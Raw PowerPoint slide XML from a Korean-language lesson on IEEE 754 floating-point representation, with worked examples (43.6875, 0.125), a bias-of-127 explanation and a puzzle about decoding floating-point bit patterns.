                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDF2CA3E-3984-4778-B2AB-DB381F252B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8498" r="994" b="17352"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758023" y="2374608"/>
            <a:ext cx="5971430" cy="217865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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{566A5BF7-EB02-48F3-8B74-4AA8C28BA403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124367" y="2136338"/>
            <a:ext cx="3649651" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>Ex) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>43.6875 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>의 부동소수점 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F7C041"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t> 43.6875</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101011.1011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>(2)</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>010111011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>2^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>+127 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>10000100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D32EBA36-9460-4BC9-9D43-E63F84391E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843916" y="5094654"/>
            <a:ext cx="318052" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="F7C041"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D39A7955-D752-44F4-B438-2D2582B1726A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3177870" y="5094654"/>
            <a:ext cx="1224501" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="55B7EE"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>10000100</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E100D61-71BE-479B-BFB3-B864664AF085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418273" y="5094654"/>
            <a:ext cx="3493274" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="89D466"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>0101 1101 1000 0000 0000 000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="타원 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07573CF6-6407-43A1-A13B-572FEEAEF304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7442421" y="4080582"/>
            <a:ext cx="397565" cy="3260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A475E72-8173-43A3-BD30-4DC2320BCA53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7124367" y="3763281"/>
            <a:ext cx="1192696" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Magic Number</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6EC79D-EE9D-4D04-B844-A86DE8838681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709530" y="5780598"/>
            <a:ext cx="7498080" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Q) 0.125 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 부동 소수점으로 나타내 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=&gt; 0 01111100  0000 0000 0000 0000 0000 000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3BA992-277D-4336-B745-3C888DA8DA4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59CF051-D58E-45F1-99A5-900D66D59A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A175B2F6-6E77-474F-B0E5-D30703ED4CD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4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC4853B-F8C6-4CB6-8DFD-33AE9872BD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8724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5" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="8"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992784"/>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부동이는  여행 도중 다음과 같은 벽화를 발견하였다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="12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아무래도 부동 소수점의 덧셈 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>인거</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 같다</a:t>
            </a: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구해보자</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2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en-US" altLang="ko-KR" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0 1111011 10011001100110011001101</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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>0 1111100 10011001100110011001101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="12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300770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parseInt</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en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>형으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>바꿀수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 있는 함수이다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진수로 표현된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string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int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바꿀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사용법을 찾아보자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부동소수점을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효율적 프로그래밍을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327031" y="531705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4" name="직선 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08419A1-C84A-4BDE-8C00-43AE66F64873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708940" y="4930041"/>
            <a:ext cx="282271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2" name="그룹 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A9A8B1-AEC6-46BD-BF22-F6B82E935024}"/>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93CD507-ABFD-4482-BF84-ED224C64A6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9B82E5A-2DA7-42F1-B1E1-0F761E50CE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5A028E0A-A77D-4CE1-BA08-5D5F1DEB6A3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62786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첫번째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답은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0.3!</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B1C0BD9C-1E83-4098-A421-0BB52389CCCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487390" y="729077"/>
            <a:ext cx="5237549" cy="2017106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1505CA5D-B6DC-4E25-A17B-C5F46E655680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="574772" y="3589264"/>
            <a:ext cx="5150168" cy="1843674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644902C1-58D5-4411-A998-53BE9D35E672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326212" y="1436004"/>
            <a:ext cx="5160688" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>먼저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>가수부의 값을 가져와서 생략되어진 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>을 추가한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>그리고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>진수로 변환한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="직선 화살표 연결선 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056CBD72-4487-400D-AD7B-1F9EFCD93774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667416" y="1562962"/>
            <a:ext cx="16587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08DD217-CAC0-4D68-98C2-E2F29847D4BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6326212" y="1842538"/>
            <a:ext cx="5160688" cy="1030603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>지수부도 마찬가지로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>진수로 변환해준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>Magic Number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>로 더해준 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>127 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>을 빼 준다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>Mantissa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>는 현재 원래의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>1.xxx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>값보다 정확히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>2^23 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>배</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>큰 값이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>따라서 지수부에서 </a:t>
            </a:r>
            <a:r>
